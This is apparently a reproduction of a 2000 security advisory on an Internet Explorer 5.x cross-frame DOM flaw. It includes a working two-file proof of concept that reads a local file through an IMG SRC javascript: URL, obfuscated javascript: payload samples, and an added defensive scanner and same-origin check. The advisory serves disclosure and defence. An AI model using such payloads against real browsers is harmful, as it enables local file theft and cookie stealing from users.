IE Allows Access to Domain Object Model

IE Allows Circumvention of Domain Security
Reported January 8, 2000 by Georgi Guninski

VERSIONS AFFECTED
Internet Explorer 5.01 (Windows 95) and Internet Explorer 5.5 (Windows NT 4.0); other versions are presumably affected as well

DESCRIPTION

Internet Explorer 5.01 under Windows 95 and Internet Explorer 5.5 under Windows NT 4.0 (other versions are presumably vulnerable as well) allow the "Cross Frame Security Policy" to be circumvented: a page can reach the DOM of the "old" document in a window by combining <IMG SRC="javascript:..."> with a design flaw in IE.

This exposes the whole DOM of the target document and creates many security risks: reading local files, reading files from any host the user can reach, window spoofing, stealing cookies, and so on.

This is an unusual exploit. If you open a new document in a window that already holds an old document, the old document's DOM remains reachable from the new document until the new document has been completely parsed and displayed. IE apparently keeps the old document alive until then.

An <IMG SRC="javascript:..."> placed in the new document runs while the new document is still being parsed, so its script has access to the old document's DOM. In the demonstration below, img2main.html first loads file://c:/test.txt into a window named "victim" and, two seconds later, clicks a link that navigates that same window to img2.html; the IMG in img2.html opens a third window whose javascript: URL reads opener.document.body.innerText, and opener is still the window holding test.txt.

DEMONSTRATION

-----------------img2main.html-------------
<A HREF="img2.html" TARGET="victim">link</A>
<SCRIPT>
alert("Create a short text file C:\\test.txt and it will be read and shown in a message box");
// Step 1: load the local file into a window named "victim".
a=window.open("file://c:/test.txt","victim");
// Step 2: two seconds later, navigate that same window to img2.html.
setTimeout("document.links[0].click()",2000);
</SCRIPT>
--------------------------------------------

----------------img2.html-------------------
<HTML>
<!-- The javascript: URL runs while img2.html is still being parsed, so the
     "victim" window still holds test.txt; the new window's opener is that
     window, and opener.document is the old document. -->
<IMG SRC="javascript:a=window.open('javascript:alert(\'Here is your file: \'+opener.document.body.innerText)');alert('Just an alert, but it is necessary. Wait a little.')">
</HTML>
--------------------------------------------

A live demonstration is available at http://www.nat.bg/~joro/img2main.html
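The two checks a defender would want from the description above, as an added example (Node.js, written for this page; it is not code from the advisory or from Microsoft, and the URL-attribute list, the obfuscated inputs and the sample markup are assumptions made for the demonstration): sameOrigin() is the scheme/host/port comparison IE's Cross Frame Security Policy should have enforced before opener.document was handed to img2.html's script, and findScriptUrlAttributes() flags the delivery vector, a javascript: URL in IMG SRC or another URL-bearing attribute, after undoing simple obfuscations.

```javascript
// Added example, not part of Guninski's advisory or Microsoft's code.
// Runs under Node.js with no dependencies.
//   1. sameOrigin(): the (scheme, host, port) comparison the Cross Frame
//      Security Policy is meant to apply before one document may read another.
//   2. findScriptUrlAttributes(): a markup scanner that flags javascript:
//      URLs in URL-bearing attributes after undoing mixed case, surrounding
//      whitespace, control characters inside the scheme and numeric entities.
// The attribute list and the sample markup are this example's own assumptions.

function originOf(urlString) {
  const u = new URL(urlString);
  // Only network schemes have a (scheme, host, port) origin. file:, about: and
  // javascript: documents are opaque: they never equal another origin, which
  // is exactly why a web page must not be able to read file://c:/test.txt.
  const network = ["http:", "https:", "ftp:", "ws:", "wss:"];
  if (!network.includes(u.protocol)) return null;
  return `${u.protocol}//${u.host}`; // u.host keeps a non-default port
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return oa !== null && oa === ob;
}

// Decode numeric character references, strip ASCII control characters and
// spaces, lower-case, then the scheme can be compared literally.
function normalizeUrlValue(value) {
  const decoded = value.replace(/&#(x[0-9a-f]+|\d+);?/gi, (_, code) => {
    const cp = code[0].toLowerCase() === "x"
      ? parseInt(code.slice(1), 16)
      : parseInt(code, 10);
    return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : "";
  });
  return decoded.replace(/[\u0000-\u0020]/g, "").toLowerCase();
}

function isScriptUrl(value) {
  const n = normalizeUrlValue(value);
  // IE of that era also executed vbscript: URLs through the same path.
  return n.startsWith("javascript:") || n.startsWith("vbscript:");
}

// Attributes that take a URL (assumed list for this example).
const URL_ATTRS = ["src", "href", "lowsrc", "dynsrc", "background", "action"];

// Regex-based tag/attribute walk: enough for a demo, not a full HTML parser.
function findScriptUrlAttributes(html) {
  const findings = [];
  const tagRe = /<([a-z][\w-]*)\b((?:"[^"]*"|'[^']*'|[^>"'])*)>/gi;
  const attrRe = /([^\s=\/]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let t;
  while ((t = tagRe.exec(html)) !== null) {
    const tag = t[1].toLowerCase();
    attrRe.lastIndex = 0;
    let a;
    while ((a = attrRe.exec(t[2])) !== null) {
      const name = a[1].toLowerCase();
      const value = a[2] !== undefined ? a[2] : a[3] !== undefined ? a[3] : a[4];
      if (URL_ATTRS.includes(name) && isScriptUrl(value)) {
        findings.push({ tag, attr: name, value });
      }
    }
  }
  return findings;
}

// Constructed sample: the advisory's vector, obfuscated variants, one benign image.
const SAMPLE_HTML = [
  `<IMG SRC="javascript:a=window.open('javascript:alert(1)');alert('wait')">`,
  `<img src=" JaVaScRiPt:alert(document.cookie)">`,
  `<img src="java&#x09;script:alert(1)">`,
  `<a href="&#106;avascript:alert(1)">link</a>`,
  `<img src="http://www.nat.bg/~joro/logo.gif">`,
].join("\n");

if (typeof module !== "undefined" && require.main === module) {
  console.log(sameOrigin("http://www.nat.bg/~joro/img2.html", "file:///c:/test.txt")); // false
  console.log(findScriptUrlAttributes(SAMPLE_HTML)); // four findings, the logo is not one
}
```

Run it with node; the scanner is a filter for untrusted markup you serve, not a fix for the browser bug, which is that IE lets the new document's script reach the old document at all. Against the bug itself the only remedies are the vendor patch and the workaround in the next section.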

VENDOR RESPONSE

Microsoft is aware of this issue, but no response was known at the time of this writing. To prevent this issue from affecting your systems, disable Active Scripting in the browser; both the script that navigates the window and the javascript: URL in the IMG SRC depend on it.

CREDITS
Discovered by Georgi Guninski
